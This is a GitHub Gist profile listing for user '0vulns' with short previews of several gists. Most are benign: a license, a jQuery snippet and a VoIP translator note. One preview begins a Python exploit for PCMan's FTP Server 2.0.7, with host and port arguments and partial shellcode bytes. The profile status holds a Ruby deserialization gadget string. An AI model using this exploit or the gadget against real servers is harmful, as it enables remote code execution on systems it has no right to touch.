Skip to content

Instantly share code, notes, and snippets.

View 0vulns's full-sized avatar
🌴
{"^o"=>[{"0"=>"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"}]}

Mohamed Ali 0vulns

🌴
{"^o"=>[{"0"=>"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"}]}
  • 127.0.0.1
View GitHub Profile
@0vulns
0vulns / LICENSE.txt
Created November 7, 2017 07:18 — forked from jed/LICENSE.txt
generate random UUIDs
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2011 Jed Schmidt <http://jed.is>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@0vulns
0vulns / library.md
Created September 12, 2017 21:35
My Library
@0vulns
0vulns / PCMan.py
Created January 4, 2017 14:53
Final PCMan's FTP Server v2.0.7 Exploit
# Final PCMan's FTP Server v2.0.7 Exploit
import sys, socket, time
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
buf = ""
buf += "\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31"
buf += "\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4"
@0vulns
0vulns / double-sign.markdown
Created November 9, 2016 21:51
Double Sign
@0vulns
0vulns / after-before.markdown
Created November 9, 2016 21:50
after&before
@0vulns
0vulns / jQuery.replace.js
Last active October 31, 2016 11:19
a jQuery method to replace text
(function ($) {
$.fn.replace = function (a, b) {
this.text(this.text().replace(a, b));
return this.text();
};
})(jQuery);
@0vulns
0vulns / inline-translator.md
Last active December 16, 2019 20:03
Create real-time/inline translator for VoIP calls.

Create real-time/inline translator for VoIP calls

Hey! Surely everybody tested Skype Translator and liked it,So if you want your own continue.